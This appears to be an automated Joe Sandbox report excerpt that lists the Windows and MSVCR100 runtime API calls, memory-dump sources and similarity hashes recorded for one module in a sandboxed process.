                                                                                                          • Opcode ID: 5565ecfba9f71cf93f5bc5125b02fa5d51baa03ce75e7befe0b6980afefbe354
                                                                                                          • Instruction ID: 78e1c00015d7144f452954e4fb85ae6e14efaf90fb9fc7808ea1e0d203a2fc97
                                                                                                          • Opcode Fuzzy Hash: 5565ecfba9f71cf93f5bc5125b02fa5d51baa03ce75e7befe0b6980afefbe354
                                                                                                          • Instruction Fuzzy Hash: 6931F475944356DFDB94AF64C88059D3BB0AF07358F11A42AF4A06F2C0EB34B8818BE1
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FDC0889
                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 6FDC088F
                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 6FDC0892
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC089C
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC08B4
                                                                                                          • _CxxThrowException.MSVCR100(6FDB38A8,6FE20C0C,?), ref: 6FDC08C2
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C,6FDB38A8,6FE20C0C,?), ref: 6FDC08C9
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6FDB38A8,6FE20C0C,?), ref: 6FDC08DC
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC092E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@CurrentProcess$??0exception@std@@??0scheduler_resource_allocation_error@??2@AcquireDuplicateErrorExceptionHandleLastLock@details@ReaderThrowWrite@_Writer
                                                                                                          • String ID: eventObject
                                                                                                          • API String ID: 349983990-1680012138
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDEDB9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDEDC3
                                                                                                          • _strnset_s.MSVCR100(?,?,?,?,?), ref: 6FDDEDEC
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEE2A
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEE56
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDEE67
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEEA1
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEEC8
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEF0B
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDEF62
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDEF6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _ismbblead_l$_errno$_invalid_parameter_noinfo$_strnset_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1238685693-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBCC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBD6
                                                                                                          • _errno.MSVCR100(00000000,00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBF5
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBFF
                                                                                                          • strncpy_s.MSVCR100(00000001,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEC23
                                                                                                          • _ismbblead_l.MSVCR100(00000000,00000000,00000001,00000000,00000001), ref: 6FDDEC88
                                                                                                          • _ismbblead_l.MSVCR100(00000000,00000000,00000001,00000000,00000001), ref: 6FDDECC4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_ismbblead_l$strncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3716565480-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDCC485
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCC490
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC49B
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000214), ref: 6FDCC4A7
                                                                                                          • _getptd.MSVCR100 ref: 6FDCC4B4
                                                                                                          • _initptd.MSVCR100(00000000,?), ref: 6FDCC4BD
                                                                                                          • CreateThread.KERNEL32(00000000,?,6FDCC41C,00000000,00000004,00000000), ref: 6FDCC4DB
                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 6FDCC4EB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC4F6
                                                                                                          • free.MSVCR100(00000000), ref: 6FDCC4FF
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCC50A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CreateErrorLastResume__set_flsgetvalue_calloc_crt_dosmaperr_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                                                                                          • String ID:
                                                                                                          • API String ID: 797981675-0
                                                                                                          APIs
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F69
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F7B
                                                                                                          • free.MSVCR100(00000000,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F8D
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F9F
                                                                                                          • free.MSVCR100(6FD843AA,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FB1
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FC3
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FD5
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FE7
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FF9
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD9700B
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD9701D
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD9702F
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD97041
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 32654580-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6FE00017
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6FE00021
                                                                                                          • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6FE00052
                                                                                                          • strcpy_s.MSVCR100(?,000000FF,e+000,?,?,?,00000016,?), ref: 6FE000CE
                                                                                                          • memmove.MSVCR100(?,0000000C,00000003,?,00000016,?), ref: 6FE00132
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000016,?), ref: 6FE00155
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE0019D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE001A4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfostrcpy_s$I10__invalid_parameter_invoke_watsonmemmove
                                                                                                          • String ID: e+000
                                                                                                          • API String ID: 1265084406-1027065040
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(E06D7363,6FDB2708,E06D7363,1FFFFFFF,19930522), ref: 6FDF454B
                                                                                                          • _getptd.MSVCR100 ref: 6FDF4559
                                                                                                          • _encoded_null.MSVCR100 ref: 6FDF4564
                                                                                                            • Part of subcall function 6FD8B377: EncodePointer.KERNEL32(00000000,6FDFB6A5,6FE27D70,00000314,00000000,?,?,?,?,?,6FDCC18D,6FE27D70,Microsoft Visual C++ Runtime Library,00012010), ref: 6FD8B379
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF45A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$?_inconsistency@@EncodePointer_encoded_null
                                                                                                          • String ID: MOC$RCC$csm$csm$csm
                                                                                                          • API String ID: 2844665667-4235121399
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD92588,0000000C), ref: 6FD924EA
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • wcslen.MSVCR100(00000000,6FD92588,0000000C), ref: 6FD92541
                                                                                                          • wcscpy_s.MSVCR100(?,?,00000000,6FD92588,0000000C), ref: 6FD9255F
                                                                                                          • _errno.MSVCR100(6FD92588,0000000C), ref: 6FDB0885
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD92588,0000000C), ref: 6FDB088F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterSection_errno_invalid_parameter_noinfo_lockwcscpy_swcslen
                                                                                                          • String ID: "
                                                                                                          • API String ID: 3068024670-123907689
                                                                                                          APIs
                                                                                                          • _mbsrchr.MSVCR100(6FDCF396,0000002E,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF58
                                                                                                          • _mbsicmp.MSVCR100(00000000,.exe,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF6B
                                                                                                          • _mbsicmp.MSVCR100(00000000,.cmd,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF7C
                                                                                                          • _mbsicmp.MSVCR100(00000000,.bat,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF8D
                                                                                                          • _mbsicmp.MSVCR100(00000000,.com,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF9E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbsicmp$_mbsrchr
                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                          • API String ID: 1759011909-4019086052
                                                                                                          APIs
                                                                                                          • wcsrchr.MSVCR100(6FDA7F90,0000002E,?,?,?,6FDA7F90,00000400,?), ref: 6FDD0666
                                                                                                          • _wcsicmp.MSVCR100(00000000,.exe,?,?,?,6FDA7F90,00000400,?), ref: 6FDD0679
                                                                                                          • _wcsicmp.MSVCR100(00000000,.cmd,?,?,?,6FDA7F90,00000400,?), ref: 6FDD068A
                                                                                                          • _wcsicmp.MSVCR100(00000000,.bat,?,?,?,6FDA7F90,00000400,?), ref: 6FDD069B
                                                                                                          • _wcsicmp.MSVCR100(00000000,.com,?,?,?,6FDA7F90,00000400,?), ref: 6FDD06AC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$wcsrchr
                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                          • API String ID: 2496260227-4019086052
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$CreateFrameInfo
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 4181383844-1018135373
                                                                                                          APIs
                                                                                                          • malloc.MSVCR100(?), ref: 6FD82336
                                                                                                            • Part of subcall function 6FD80233: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7), ref: 6FD80263
                                                                                                          • _callnewh.MSVCR100(?), ref: 6FDAF2A8
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(?,00000001), ref: 6FDAF2DF
                                                                                                          • atexit.MSVCR100(6FE209C8,?,00000001), ref: 6FDAF2EF
                                                                                                          • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(6FE28518), ref: 6FDAF2F9
                                                                                                          • _CxxThrowException.MSVCR100(?,6FD8C888,6FE28518), ref: 6FDAF30A
                                                                                                          • _errno.MSVCR100 ref: 6FDAF319
                                                                                                          • _errno.MSVCR100 ref: 6FDAF326
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@_errno$AllocExceptionHeapThrowV01@@_callnewhatexitmalloc
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 1227329287-2104205924
                                                                                                          APIs
                                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC352
                                                                                                          • free.MSVCR100(00000000,?,?,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC355
                                                                                                          • DeleteCriticalSection.KERNEL32(FFFFFFFF,?,?,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC37C
                                                                                                          • DecodePointer.KERNEL32(FFFFFFFF,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC6F8
                                                                                                          • TlsFree.KERNEL32(FFFFFFFF,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC716
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalDeleteSection$DecodeFreePointerfree
                                                                                                          • String ID: 0Mo$0Mo$PNo$PNo
                                                                                                          • API String ID: 1464103408-3962907252
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 6FD96170
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 6FD961D6
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,6FD962D7,00000000,00000000,00000000), ref: 6FD961EF
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,6FD962D7,00000000,00000000,00000000), ref: 6FD96240
                                                                                                          • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6FD96254
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD9625E
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD96267
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_freea_s$CompareString
                                                                                                          • String ID:
                                                                                                          • API String ID: 3891795400-0
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6FD86178
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6FD861DB
                                                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6FD861F7
                                                                                                          • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6FD86261
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6FD86280
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD8628A
                                                                                                          • _freea_s.MSVCR100(?), ref: 6FD86293
                                                                                                          • malloc.MSVCR100(00000008), ref: 6FDB0D19
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6FDBD7F5,00000000,?,00000000,00000000), ref: 6FDC2439
